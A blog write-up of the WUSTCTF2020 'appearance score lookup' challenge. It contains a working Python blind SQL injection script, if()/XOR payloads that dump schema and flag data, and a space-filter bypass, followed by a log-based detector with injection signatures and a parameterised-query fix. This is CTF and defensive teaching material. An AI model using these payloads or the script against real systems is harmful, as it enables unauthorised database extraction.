Z1d10t's Blog

A note for myself, have fun!


[WUSTCTF2020] 颜值成绩查询 (Appearance Score Lookup)

A classic boolean-based blind injection: an `if()` condition acts as the true/false oracle and a binary search narrows down each character. Spaces are filtered, which is bypassed by nesting expressions in parentheses or by using `/**/` in place of spaces. Nothing else about it is tricky.

A quick review of the binary search:

```python
import requests
import time

url = 'http://622046c8-08bf-4bd2-8873-9d43830c90c6.node4.buuoj.cn:81/'
result = ''
for i in range(1, 25):
    # search the printable ASCII range for the i-th character
    low = 31
    high = 127
    mid = (low + high) // 2
    while low <= high:
        payload = {"stunum": "if(ascii(substr((select(value)from(ctf.flag)),{},1))>{},1,0)".format(i, mid)}
        # dump database name: if(ascii(substr(database(),{},1))>{},1,0)
        # dump table names:   if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{},1,0)
        # dump column names:  if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{},1,0)
        # dump data:          if(ascii(substr((select(value)from(ctf.flag)),{},1))>{},1,0)
        r = requests.get(url=url, params=payload)
        if "admin" in r.text:
            # "admin" in the response means the if() condition was true: character > mid
            low = mid + 1
            mid = (low + high) // 2
        else:
            high = mid - 1
            mid = (low + high) // 2
    # the loop ends with high + 1 == low == the character's ASCII value
    result += chr(high + 1)
    print(result)
    time.sleep(0.3)
```

XOR can of course be used for the injection as well.

Payloads:

```sql
0^(ascii(substr(database(),1,1))>97) -- dump database name
0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),1,1))>97) -- dump table names
0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),1,1))>97) -- dump column names
0^(ascii(substr((select(value)from(ctf.flag)),1,1))>97) -- dump data
```
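Both the `if()` oracle script and the XOR payloads above leave a very recognisable trace: hundreds of requests to the same parameter, each carrying `ascii(substr(...))` compared against a number, with `/**/` or nested parentheses standing in for spaces. The following is an added example from the defender's side, not code from the original post: a small detector that URL-decodes the `stunum` parameter from constructed access-log lines (placeholder IPs, constructed timestamps), collapses the space-filter bypasses, and flags the oracle shapes used here, plus a parameterised version of the lookup showing that a bound value is never evaluated as SQL. The log format and the `score` table are assumptions.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original post); IPs and times are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?stunum=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /?stunum=if(ascii(substr(database()%2C1%2C1))%3E97%2C1%2C0) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /?stunum=0%5E(ascii(substr((select(value)from(ctf.flag))%2C1%2C1))%3E97) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /?stunum=1/**/and/**/ascii(substr(database(),1,1))>97 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /?stunum=20190001 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Signatures of the boolean oracles used in the write-up (if()-based, XOR-based, schema probing).
PATTERNS = {
    "if_oracle": re.compile(r"\bif\s*\(\s*ascii\s*\(\s*substr", re.I),
    "xor_oracle": re.compile(r"\d\s*\^\s*\(\s*ascii\s*\(\s*substr", re.I),
    "schema_probe": re.compile(r"information_schema\.(tables|columns)", re.I),
    "ascii_compare": re.compile(r"ascii\s*\(\s*substr\s*\(.*?\)\s*[<>=]", re.I),
}


def normalize(value: str) -> str:
    """Collapse the space-filter bypass: every /**/ comment becomes a single space."""
    return re.sub(r"/\*.*?\*/", " ", value)


def classify_params(query: str) -> dict:
    """Return {param: [matched signatures]} for each query parameter that looks like a blind-SQLi probe.
    parse_qsl already URL-decodes the values."""
    hits = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        text = normalize(value)
        matched = [sig for sig, rx in PATTERNS.items() if rx.search(text)]
        if matched:
            hits[name] = matched
    return hits


def scan_log(log_text: str) -> list:
    """Walk access-log lines and return (client_ip, hits) for every request carrying an oracle payload."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        hits = classify_params(query)
        if hits:
            findings.append((line.split()[0], hits))
    return findings


def safe_lookup(stunum: str):
    """Parameterised form of the score lookup (assumed schema, in-memory SQLite): the value is bound,
    never spliced into the SQL text, so an oracle payload is compared as a plain string and matches nothing."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE score (stunum TEXT PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO score VALUES ('20190001', 'admin')")  # constructed row
    row = conn.execute("SELECT name FROM score WHERE stunum = ?", (stunum,)).fetchone()
    conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, hits)
    print(safe_lookup("20190001"))
    print(safe_lookup("if(ascii(substr(database(),1,1))>97,1,0)"))
```

The detector normalises before matching so that the `/**/` trick from the challenge does not evade it; a production rule would additionally count probes per client and parameter, since the binary search needs roughly seven requests per character and that burst is the clearest signal. The parameterised lookup is the actual fix: the space blacklist the challenge relied on is exactly the kind of filter that `()` nesting and `/**/` defeat.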
